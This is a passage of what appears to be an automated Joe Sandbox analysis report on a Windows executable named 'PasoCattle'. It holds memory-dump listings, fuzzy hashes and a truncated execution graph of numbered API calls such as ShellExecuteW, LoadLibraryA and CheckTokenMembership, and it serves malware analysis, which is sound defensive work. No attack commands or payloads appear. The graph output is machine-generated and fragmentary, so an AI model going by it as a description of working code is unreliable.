                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0.8%
                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:63
                                                                                                                                                                          execution_graph 103061 105650 103070 ce3d5 103061->103070 103063 105666 103069 1056e1 103063->103069 103079 caa65 9 API calls 103063->103079 103066 1056c1 103066->103069 103080 12247e 8 API calls 103066->103080 103067 1061d7 103069->103067 103081 123fe1 81 API calls __wsopen_s 103069->103081 103071 ce3f6 103070->103071 103072 ce3e3 103070->103072 103073 ce429 103071->103073 103074 ce3fb 103071->103074 103082 bb4c8 8 API calls 103072->103082 103092 bb4c8 8 API calls 103073->103092 103083 d014b 103074->103083 103078 ce3ed 103078->103063 103079->103066 103080->103069 103081->103067 103082->103078 103085 d0150 ___std_exception_copy 103083->103085 103084 d016a 103084->103078 103085->103084 103088 d016c 103085->103088 103093 d521d 7 API calls 2 library calls 103085->103093 103087 d09dd 103095 d3614 RaiseException 103087->103095 103088->103087 103094 d3614 RaiseException 103088->103094 103091 d09fa 103091->103078 103092->103078 103093->103085 103094->103087 103095->103091 103096 bda4a 103097 bda54 103096->103097 103107 bdbc4 103096->103107 103097->103107 103126 bcf80 103097->103126 103099 bdace 103100 d014b 8 API calls 103099->103100 103101 bdae7 103100->103101 103134 d017b 103101->103134 103103 bdb05 103104 d014b 8 API calls 103103->103104 103106 bdb16 __fread_nolock 103104->103106 103105 d014b 8 API calls 103109 bdb7f 103105->103109 103106->103105 103106->103107 103108 d017b 8 API calls 103107->103108 103111 bd5e1 103107->103111 103113 bdc19 103107->103113 103108->103107 103109->103107 103110 bcf80 39 API calls 103109->103110 103110->103107 103112 d014b 8 API calls 103111->103112 103118 bd66e ISource 103112->103118 103115 bbed9 8 API calls 103115->103118 103118->103115 103119 101f79 103118->103119 103121 101f94 103118->103121 103122 bc3ab 8 API calls 103118->103122 103123 bd911 ISource 103118->103123 103152 bb4c8 8 API calls 103118->103152 103153 1156ae 8 API calls ISource 103119->103153 103122->103118 103124 bd9ac ISource 103123->103124 103143 bc3ab 103123->103143 103125 bd9c3 103124->103125 103151 ce30a 8 API calls ISource 103124->103151 103127 bd1c7 103126->103127 103129 bcf93 103126->103129 103127->103099 103132 bd03d 103129->103132 103154 d05b2 5 API calls __Init_thread_wait 103129->103154 103155 bbf73 103129->103155 103160 d0413 29 API calls __onexit 103129->103160 103161 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103129->103161 103132->103099 103135 d014b ___std_exception_copy 103134->103135 103136 d016a 103135->103136 103139 d016c 103135->103139 103162 d521d 7 API calls 2 library calls 103135->103162 103136->103103 103138 d09dd 103164 d3614 RaiseException 103138->103164 103139->103138 103163 d3614 RaiseException 103139->103163 103141 d09fa 103141->103103 103144 bc3b9 103143->103144 103150 bc3e1 ISource 103143->103150 103145 bc3c7 103144->103145 103147 bc3ab 8 API calls 103144->103147 103146 bc3cd 103145->103146 103148 bc3ab 8 API calls 103145->103148 103146->103150 103165 bc7e0 8 API calls ISource 103146->103165 103147->103145 103148->103146 103150->103124 103151->103124 103152->103118 103153->103121 103154->103129 103156 d017b 8 API calls 103155->103156 103157 bbf88 103156->103157 103158 d014b 8 API calls 103157->103158 103159 bbf96 103158->103159 103159->103129 103160->103129 103161->103129 103162->103135 103163->103138 103164->103141 103165->103150 103166 df06e 103167 df07a CallCatchBlock 103166->103167 103168 df09b 103167->103168 103169 df086 103167->103169 103179 d94fd EnterCriticalSection 103168->103179 103185 df649 20 API calls _abort 103169->103185 103172 df08b 103186 e2b5c 26 API calls pre_c_initialization 103172->103186 103173 df0a7 103180 df0db 103173->103180 103178 df096 __wsopen_s 103179->103173 103188 df106 103180->103188 103182 df0e8 103184 df0b4 103182->103184 103208 df649 20 API calls _abort 103182->103208 103187 df0d1 LeaveCriticalSection __fread_nolock 103184->103187 103185->103172 103186->103178 103187->103178 103189 df12e 103188->103189 103190 df114 103188->103190 103209 ddcc5 103189->103209 103219 df649 20 API calls _abort 103190->103219 103193 df119 103220 e2b5c 26 API calls pre_c_initialization 103193->103220 103194 df137 103216 e9789 103194->103216 103198 df1bf 103201 df1dc 103198->103201 103204 df1ee 103198->103204 103199 df23b 103200 df248 103199->103200 103199->103204 103222 df649 20 API calls _abort 103200->103222 103221 df41f 31 API calls 4 library calls 103201->103221 103205 df124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103204->103205 103223 df29b 30 API calls 2 library calls 103204->103223 103205->103182 103206 df1e6 103206->103205 103208->103184 103210 ddce6 103209->103210 103211 ddcd1 103209->103211 103210->103194 103224 df649 20 API calls _abort 103211->103224 103213 ddcd6 103225 e2b5c 26 API calls pre_c_initialization 103213->103225 103215 ddce1 103215->103194 103226 e9606 103216->103226 103218 df153 103218->103198 103218->103199 103218->103205 103219->103193 103220->103205 103221->103206 103222->103205 103223->103205 103224->103213 103225->103215 103227 e9612 CallCatchBlock 103226->103227 103228 e961a 103227->103228 103229 e9632 103227->103229 103261 df636 20 API calls _abort 103228->103261 103231 e96e6 103229->103231 103235 e966a 103229->103235 103266 df636 20 API calls _abort 103231->103266 103232 e961f 103262 df649 20 API calls _abort 103232->103262 103251 e54ba EnterCriticalSection 103235->103251 103236 e96eb 103267 df649 20 API calls _abort 103236->103267 103237 e9627 __wsopen_s 103237->103218 103240 e9670 103242 e96a9 103240->103242 103243 e9694 103240->103243 103241 e96f3 103268 e2b5c 26 API calls pre_c_initialization 103241->103268 103252 e970b 103242->103252 103263 df649 20 API calls _abort 103243->103263 103247 e9699 103264 df636 20 API calls _abort 103247->103264 103248 e96a4 103265 e96de LeaveCriticalSection __wsopen_s 103248->103265 103251->103240 103269 e5737 103252->103269 103254 e971d 103255 e9736 SetFilePointerEx 103254->103255 103256 e9725 103254->103256 103257 e974e GetLastError 103255->103257 103260 e972a 103255->103260 103282 df649 20 API calls _abort 103256->103282 103283 df613 20 API calls __dosmaperr 103257->103283 103260->103248 103261->103232 103262->103237 103263->103247 103264->103248 103265->103237 103266->103236 103267->103241 103268->103237 103270 e5759 103269->103270 103271 e5744 103269->103271 103276 e577e 103270->103276 103286 df636 20 API calls _abort 103270->103286 103284 df636 20 API calls _abort 103271->103284 103273 e5749 103285 df649 20 API calls _abort 103273->103285 103276->103254 103277 e5789 103287 df649 20 API calls _abort 103277->103287 103278 e5751 103278->103254 103280 e5791 103288 e2b5c 26 API calls pre_c_initialization 103280->103288 103282->103260 103283->103260 103284->103273 103285->103278 103286->103277 103287->103280 103288->103278 103289 106555 103290 d014b 8 API calls 103289->103290 103291 10655c 103290->103291 103292 106575 __fread_nolock 103291->103292 103293 d017b 8 API calls 103291->103293 103294 d017b 8 API calls 103292->103294 103293->103292 103295 10659a 103294->103295 103296 d076b 103297 d0777 CallCatchBlock 103296->103297 103326 d0221 103297->103326 103299 d077e 103300 d08d1 103299->103300 103303 d07a8 103299->103303 103364 d0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103300->103364 103302 d08d8 103365 d51c2 28 API calls _abort 103302->103365 103315 d07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103303->103315 103337 e27ed 103303->103337 103305 d08de 103366 d5174 28 API calls _abort 103305->103366 103308 d08e6 103310 d07c7 103312 d0848 103345 d0cc9 103312->103345 103314 d084e 103349 b331b 103314->103349 103315->103312 103360 d518a 38 API calls 2 library calls 103315->103360 103320 d086a 103320->103302 103321 d086e 103320->103321 103322 d0877 103321->103322 103362 d5165 28 API calls _abort 103321->103362 103363 d03b0 13 API calls 2 library calls 103322->103363 103325 d087f 103325->103310 103327 d022a 103326->103327 103367 d0a08 IsProcessorFeaturePresent 103327->103367 103329 d0236 103368 d3004 10 API calls 3 library calls 103329->103368 103331 d023b 103336 d023f 103331->103336 103369 e2687 103331->103369 103334 d0256 103334->103299 103336->103299 103340 e2804 103337->103340 103338 d0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103339 d07c1 103338->103339 103339->103310 103341 e2791 103339->103341 103340->103338 103342 e27c0 103341->103342 103343 d0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103342->103343 103344 e27e9 103343->103344 103344->103315 103444 d26b0 103345->103444 103348 d0cef 103348->103314 103350 b3327 IsThemeActive 103349->103350 103352 b3382 103349->103352 103446 d52b3 103350->103446 103361 d0d02 GetModuleHandleW 103352->103361 103353 b3352 103452 d5319 103353->103452 103355 b3359 103459 b32e6 SystemParametersInfoW SystemParametersInfoW 103355->103459 103357 b3360 103460 b338b 103357->103460 103359 b3368 SystemParametersInfoW 103359->103352 103360->103312 103361->103320 103362->103322 103363->103325 103364->103302 103365->103305 103366->103308 103367->103329 103368->103331 103373 ed576 103369->103373 103372 d302d 8 API calls 3 library calls 103372->103336 103374 ed593 103373->103374 103377 ed58f 103373->103377 103374->103377 103379 e4f6e 103374->103379 103376 d0248 103376->103334 103376->103372 103391 d0dfc 103377->103391 103380 e4f7a CallCatchBlock 103379->103380 103398 e32d1 EnterCriticalSection 103380->103398 103382 e4f81 103399 e5422 103382->103399 103384 e4f90 103385 e4f9f 103384->103385 103412 e4e02 29 API calls 103384->103412 103414 e4fbb LeaveCriticalSection _abort 103385->103414 103388 e4f9a 103413 e4eb8 GetStdHandle GetFileType 103388->103413 103389 e4fb0 __wsopen_s 103389->103374 103392 d0e05 103391->103392 103393 d0e07 IsProcessorFeaturePresent 103391->103393 103392->103376 103395 d0fce 103393->103395 103443 d0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103395->103443 103397 d10b1 103397->103376 103398->103382 103400 e542e CallCatchBlock 103399->103400 103401 e543b 103400->103401 103402 e5452 103400->103402 103423 df649 20 API calls _abort 103401->103423 103415 e32d1 EnterCriticalSection 103402->103415 103405 e5440 103424 e2b5c 26 API calls pre_c_initialization 103405->103424 103407 e548a 103425 e54b1 LeaveCriticalSection _abort 103407->103425 103408 e544a __wsopen_s 103408->103384 103411 e545e 103411->103407 103416 e5373 103411->103416 103412->103388 103413->103385 103414->103389 103415->103411 103426 e4ff0 103416->103426 103418 e5392 103434 e2d38 103418->103434 103419 e5385 103419->103418 103433 e3778 11 API calls 2 library calls 103419->103433 103421 e53e4 103421->103411 103423->103405 103424->103408 103425->103408 103431 e4ffd _abort 103426->103431 103427 e503d 103441 df649 20 API calls _abort 103427->103441 103428 e5028 RtlAllocateHeap 103429 e503b 103428->103429 103428->103431 103429->103419 103431->103427 103431->103428 103440 d521d 7 API calls 2 library calls 103431->103440 103433->103419 103435 e2d43 RtlFreeHeap 103434->103435 103439 e2d6c __dosmaperr 103434->103439 103436 e2d58 103435->103436 103435->103439 103442 df649 20 API calls _abort 103436->103442 103438 e2d5e GetLastError 103438->103439 103439->103421 103440->103431 103441->103429 103442->103438 103443->103397 103445 d0cdc GetStartupInfoW 103444->103445 103445->103348 103447 d52bf CallCatchBlock 103446->103447 103509 e32d1 EnterCriticalSection 103447->103509 103449 d52ca pre_c_initialization 103510 d530a 103449->103510 103451 d52ff __wsopen_s 103451->103353 103453 d533f 103452->103453 103454 d5325 103452->103454 103453->103355 103454->103453 103514 df649 20 API calls _abort 103454->103514 103456 d532f 103515 e2b5c 26 API calls pre_c_initialization 103456->103515 103458 d533a 103458->103355 103459->103357 103461 b339b __wsopen_s 103460->103461 103462 bbf73 8 API calls 103461->103462 103463 b33a7 GetCurrentDirectoryW 103462->103463 103516 b4fd9 103463->103516 103465 b33ce IsDebuggerPresent 103466 b33dc 103465->103466 103467 f3ca3 MessageBoxA 103465->103467 103468 f3cbb 103466->103468 103469 b33f0 103466->103469 103467->103468 103646 b4176 8 API calls 103468->103646 103584 b3a95 103469->103584 103477 b3462 103478 f3cec SetCurrentDirectoryW 103477->103478 103479 b346a 103477->103479 103478->103479 103480 b3475 103479->103480 103647 111fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103479->103647 103628 b34d3 7 API calls 103480->103628 103483 f3d07 103483->103480 103486 f3d19 103483->103486 103648 b5594 103486->103648 103487 b347f 103491 b3494 103487->103491 103632 b396b 103487->103632 103489 f3d22 103655 bb329 103489->103655 103494 b34af 103491->103494 103642 b3907 103491->103642 103493 f3d30 103495 f3d5f 103493->103495 103496 f3d38 103493->103496 103498 b34b6 SetCurrentDirectoryW 103494->103498 103499 b6b7c 8 API calls 103495->103499 103661 b6b7c 103496->103661 103501 b34ca 103498->103501 103502 f3d5b GetForegroundWindow ShellExecuteW 103499->103502 103501->103359 103506 f3d90 103502->103506 103506->103494 103508 b6b7c 8 API calls 103508->103502 103509->103449 103513 e3319 LeaveCriticalSection 103510->103513 103512 d5311 103512->103451 103513->103512 103514->103456 103515->103458 103517 bbf73 8 API calls 103516->103517 103518 b4fef 103517->103518 103679 b63d7 103518->103679 103520 b500d 103693 bbd57 103520->103693 103524 b502c 103703 b893c 103524->103703 103527 bb329 8 API calls 103528 b5045 103527->103528 103706 bbe2d 103528->103706 103530 b5055 103531 bb329 8 API calls 103530->103531 103532 b507b 103531->103532 103533 bbe2d 39 API calls 103532->103533 103534 b508a 103533->103534 103535 bbf73 8 API calls 103534->103535 103536 b50a8 103535->103536 103710 b51ca 103536->103710 103540 b50c2 103541 b50cc 103540->103541 103542 f4b23 103540->103542 103543 d4d98 _strftime 40 API calls 103541->103543 103544 b51ca 8 API calls 103542->103544 103545 b50d7 103543->103545 103546 f4b37 103544->103546 103545->103546 103547 b50e1 103545->103547 103548 b51ca 8 API calls 103546->103548 103549 d4d98 _strftime 40 API calls 103547->103549 103550 f4b53 103548->103550 103551 b50ec 103549->103551 103553 b5594 10 API calls 103550->103553 103551->103550 103552 b50f6 103551->103552 103554 d4d98 _strftime 40 API calls 103552->103554 103555 f4b76 103553->103555 103556 b5101 103554->103556 103557 b51ca 8 API calls 103555->103557 103558 b510b 103556->103558 103559 f4b9f 103556->103559 103561 f4b82 103557->103561 103562 b512e 103558->103562 103563 bbed9 8 API calls 103558->103563 103560 b51ca 8 API calls 103559->103560 103564 f4bbd 103560->103564 103566 bbed9 8 API calls 103561->103566 103565 f4bda 103562->103565 103726 b7e12 103562->103726 103567 b5121 103563->103567 103568 bbed9 8 API calls 103564->103568 103570 f4b90 103566->103570 103571 b51ca 8 API calls 103567->103571 103572 f4bcb 103568->103572 103574 b51ca 8 API calls 103570->103574 103571->103562 103575 b51ca 8 API calls 103572->103575 103574->103559 103575->103565 103579 b893c 8 API calls 103581 b5167 103579->103581 103580 b8a60 8 API calls 103580->103581 103581->103579 103581->103580 103582 b51ab 103581->103582 103583 b51ca 8 API calls 103581->103583 103582->103465 103583->103581 103585 b3aa2 __wsopen_s 103584->103585 103586 b3abb 103585->103586 103587 f40da ___scrt_fastfail 103585->103587 103781 b5851 103586->103781 103590 f40f6 GetOpenFileNameW 103587->103590 103592 f4145 103590->103592 103593 b8577 8 API calls 103592->103593 103595 f415a 103593->103595 103595->103595 103597 b3ad9 103809 b62d5 103597->103809 104493 b3624 7 API calls 103628->104493 103630 b347a 103631 b35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103630->103631 103631->103487 103633 b3996 ___scrt_fastfail 103632->103633 104494 b5f32 103633->104494 103637 b3a3a Shell_NotifyIconW 104498 b61a9 103637->104498 103638 f40cd Shell_NotifyIconW 103640 b3a1c 103640->103637 103640->103638 103641 b3a50 103641->103491 103643 b3969 103642->103643 103644 b3919 ___scrt_fastfail 103642->103644 103643->103494 103645 b3938 Shell_NotifyIconW 103644->103645 103645->103643 103646->103477 103647->103483 103649 f22d0 __wsopen_s 103648->103649 103650 b55a1 GetModuleFileNameW 103649->103650 103651 bb329 8 API calls 103650->103651 103652 b55c7 103651->103652 103653 b5851 9 API calls 103652->103653 103654 b55d1 103653->103654 103654->103489 103656 bb338 _wcslen 103655->103656 103657 d017b 8 API calls 103656->103657 103658 bb360 __fread_nolock 103657->103658 103659 d014b 8 API calls 103658->103659 103660 bb376 103659->103660 103660->103493 103662 f57fe 103661->103662 103663 b6b93 103661->103663 103665 d014b 8 API calls 103662->103665 104536 b6ba4 103663->104536 103667 f5808 _wcslen 103665->103667 103666 b6b9e 103670 b7bb5 103666->103670 103668 d017b 8 API calls 103667->103668 103669 f5841 __fread_nolock 103668->103669 103671 f641d 103670->103671 103672 b7bc7 103670->103672 104561 1113c8 8 API calls __fread_nolock 103671->104561 104551 b7bd8 103672->104551 103675 b7bd3 103675->103508 103676 f6427 103677 f6433 103676->103677 103678 bbed9 8 API calls 103676->103678 103678->103677 103680 b63e4 __wsopen_s 103679->103680 103681 b8577 8 API calls 103680->103681 103682 b6416 103680->103682 103681->103682 103690 b644c 103682->103690 103748 b655e 103682->103748 103684 b655e 8 API calls 103684->103690 103685 b651a 103686 bb329 8 API calls 103685->103686 103691 b654f 103685->103691 103687 b6543 103686->103687 103689 b6a7c 8 API calls 103687->103689 103688 bb329 8 API calls 103688->103690 103689->103691 103690->103684 103690->103685 103690->103688 103751 b6a7c 103690->103751 103691->103520 103694 bbd71 103693->103694 103695 b5021 103693->103695 103696 d014b 8 API calls 103694->103696 103699 bbed9 103695->103699 103697 bbd7b 103696->103697 103698 d017b 8 API calls 103697->103698 103698->103695 103700 bbefc __fread_nolock 103699->103700 103701 bbeed 103699->103701 103700->103524 103701->103700 103702 d017b 8 API calls 103701->103702 103702->103700 103704 d014b 8 API calls 103703->103704 103705 b5038 103704->103705 103705->103527 103707 bbe38 103706->103707 103708 bbe67 103707->103708 103763 bbfa5 39 API calls 103707->103763 103708->103530 103711 b51f2 103710->103711 103712 b51d4 103710->103712 103713 b8577 8 API calls 103711->103713 103714 b50b4 103712->103714 103715 bbed9 8 API calls 103712->103715 103713->103714 103716 d4d98 103714->103716 103715->103714 103717 d4e1b 103716->103717 103718 d4da6 103716->103718 103766 d4e2d 40 API calls 4 library calls 103717->103766 103725 d4dcb 103718->103725 103764 df649 20 API calls _abort 103718->103764 103720 d4e28 103720->103540 103722 d4db2 103765 e2b5c 26 API calls pre_c_initialization 103722->103765 103724 d4dbd 103724->103540 103725->103540 103727 b7e1a 103726->103727 103728 d014b 8 API calls 103727->103728 103729 b7e28 103728->103729 103767 b8445 103729->103767 103732 b8470 103770 bc760 103732->103770 103734 b8480 103735 d017b 8 API calls 103734->103735 103736 b514c 103734->103736 103735->103736 103737 b8a60 103736->103737 103738 b8a76 103737->103738 103739 f6737 103738->103739 103744 b8a80 103738->103744 103779 cb7a2 8 API calls 103739->103779 103740 f6744 103780 bb4c8 8 API calls 103740->103780 103743 f6762 103743->103743 103744->103740 103745 b8b94 103744->103745 103747 b8b9b 103744->103747 103746 d014b 8 API calls 103745->103746 103746->103747 103747->103581 103757 bc2c9 103748->103757 103750 b6569 103750->103682 103752 b6a8b 103751->103752 103753 b6aac __fread_nolock 103751->103753 103755 d017b 8 API calls 103752->103755 103754 d014b 8 API calls 103753->103754 103756 b6abf 103754->103756 103755->103753 103756->103690 103758 bc2d9 __fread_nolock 103757->103758 103759 bc2dc 103757->103759 103758->103750 103760 d014b 8 API calls 103759->103760 103761 bc2e7 103760->103761 103762 d017b 8 API calls 103761->103762 103762->103758 103763->103708 103764->103722 103765->103724 103766->103720 103768 d014b 8 API calls 103767->103768 103769 b513e 103768->103769 103769->103732 103771 bc76b 103770->103771 103772 101285 103771->103772 103777 bc773 ISource 103771->103777 103773 d014b 8 API calls 103772->103773 103776 101291 103773->103776 103774 bc77a 103774->103734 103776->103776 103777->103774 103778 bc7e0 8 API calls ISource 103777->103778 103778->103777 103779->103740 103780->103743 103839 f22d0 103781->103839 103784 b5898 103786 bbd57 8 API calls 103784->103786 103785 b587d 103787 b8577 8 API calls 103785->103787 103788 b5889 103786->103788 103787->103788 103841 b55dc 103788->103841 103791 b3a57 103792 f22d0 __wsopen_s 103791->103792 103793 b3a64 GetLongPathNameW 103792->103793 103794 b8577 8 API calls 103793->103794 103795 b3a8c 103794->103795 103796 b53f2 103795->103796 103797 bbf73 8 API calls 103796->103797 103798 b5404 103797->103798 103799 b5851 9 API calls 103798->103799 103800 b540f 103799->103800 103801 b541a 103800->103801 103805 f4d5b 103800->103805 103802 b6a7c 8 API calls 103801->103802 103804 b5426 103802->103804 103849 b1340 103804->103849 103807 f4d7d 103805->103807 103855 ce36b 41 API calls 103805->103855 103808 b5439 103808->103597 103856 b6679 103809->103856 103812 f5336 103981 1236b8 103812->103981 103813 b6679 93 API calls 103815 b630e 103813->103815 103815->103812 103817 b6316 103815->103817 103821 b6322 103817->103821 103822 f5353 103817->103822 103878 b3b39 103821->103878 104032 11e30e 82 API calls 103822->104032 103826 f5361 103840 b585e GetFullPathNameW 103839->103840 103840->103784 103840->103785 103842 b55ea 103841->103842 103845 badf4 103842->103845 103844 b3ac4 103844->103791 103846 bae0b __fread_nolock 103845->103846 103847 bae02 103845->103847 103846->103844 103847->103846 103848 bc2c9 8 API calls 103847->103848 103848->103846 103850 b1352 103849->103850 103854 b1371 __fread_nolock 103849->103854 103852 d017b 8 API calls 103850->103852 103851 d014b 8 API calls 103853 b1388 103851->103853 103852->103854 103853->103808 103854->103851 103855->103805 104035 b663e LoadLibraryA 103856->104035 103861 f5648 103863 b66e7 68 API calls 103861->103863 103862 b66a4 LoadLibraryExW 104043 b6607 LoadLibraryA 103862->104043 103865 f564f 103863->103865 103867 b6607 3 API calls 103865->103867 103869 f5657 103867->103869 104064 b684a 103869->104064 103870 b66ce 103870->103869 103871 b66da 103870->103871 103873 b66e7 68 API calls 103871->103873 103875 b62fa 103873->103875 103875->103812 103875->103813 103982 1236d4 103981->103982 103983 b6874 64 API calls 103982->103983 103984 1236e8 103983->103984 104390 123827 103984->104390 104032->103826 104036 b6656 GetProcAddress 104035->104036 104037 b6674 104035->104037 104038 b6666 104036->104038 104040 de95b 104037->104040 104038->104037 104039 b666d FreeLibrary 104038->104039 104039->104037 104072 de89a 104040->104072 104042 b6698 104042->103861 104042->103862 104044 b663b 104043->104044 104045 b661c GetProcAddress 104043->104045 104048 b6720 104044->104048 104046 b662c 104045->104046 104046->104044 104047 b6634 FreeLibrary 104046->104047 104047->104044 104049 d017b 8 API calls 104048->104049 104050 b6735 104049->104050 104124 b423c 104050->104124 104052 b6741 __fread_nolock 104053 f56c2 104052->104053 104057 b677c 104052->104057 104132 123a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104052->104132 104133 123a92 74 API calls 104053->104133 104056 b684a 40 API calls 104056->104057 104057->104056 104058 f5706 104057->104058 104059 b6874 64 API calls 104057->104059 104061 b6810 ISource 104057->104061 104127 b6874 104058->104127 104059->104057 104061->103870 104065 b685c 104064->104065 104066 f5760 104064->104066 104165 dec34 104065->104165 104069 1232bd 104267 12310d 104069->104267 104071 1232d8 104074 de8a6 CallCatchBlock 104072->104074 104073 de8b4 104097 df649 20 API calls _abort 104073->104097 104074->104073 104076 de8e4 104074->104076 104078 de8e9 104076->104078 104079 de8f6 104076->104079 104077 de8b9 104098 e2b5c 26 API calls pre_c_initialization 104077->104098 104099 df649 20 API calls _abort 104078->104099 104089 e83e1 104079->104089 104083 de8ff 104084 de905 104083->104084 104085 de912 104083->104085 104100 df649 20 API calls _abort 104084->104100 104101 de944 LeaveCriticalSection __fread_nolock 104085->104101 104086 de8c4 __wsopen_s 104086->104042 104090 e83ed CallCatchBlock 104089->104090 104102 e32d1 EnterCriticalSection 104090->104102 104092 e83fb 104103 e847b 104092->104103 104096 e842c __wsopen_s 104096->104083 104097->104077 104098->104086 104099->104086 104100->104086 104101->104086 104102->104092 104110 e849e 104103->104110 104104 e84f7 104105 e4ff0 _abort 20 API calls 104104->104105 104106 e8500 104105->104106 104108 e2d38 _free 20 API calls 104106->104108 104109 e8509 104108->104109 104111 e8408 104109->104111 104121 e3778 11 API calls 2 library calls 104109->104121 104110->104104 104110->104110 104110->104111 104119 d94fd EnterCriticalSection 104110->104119 104120 d9511 LeaveCriticalSection 104110->104120 104116 e8437 104111->104116 104114 e8528 104122 d94fd EnterCriticalSection 104114->104122 104123 e3319 LeaveCriticalSection 104116->104123 104118 e843e 104118->104096 104119->104110 104120->104110 104121->104114 104122->104111 104123->104118 104125 d014b 8 API calls 104124->104125 104126 b424e 104125->104126 104126->104052 104128 b6883 104127->104128 104129 f5780 104127->104129 104134 df053 104128->104134 104132->104053 104133->104057 104137 dee1a 104134->104137 104139 dee26 CallCatchBlock 104137->104139 104138 dee32 104162 df649 20 API calls _abort 104138->104162 104139->104138 104140 dee58 104139->104140 104150 d94fd EnterCriticalSection 104140->104150 104143 dee37 104163 e2b5c 26 API calls pre_c_initialization 104143->104163 104144 dee64 104151 def7a 104144->104151 104150->104144 104162->104143 104168 dec51 104165->104168 104167 b686d 104167->104069 104169 dec5d CallCatchBlock 104168->104169 104170 dec9d 104169->104170 104171 dec70 ___scrt_fastfail 104169->104171 104172 dec95 __wsopen_s 104169->104172 104181 d94fd EnterCriticalSection 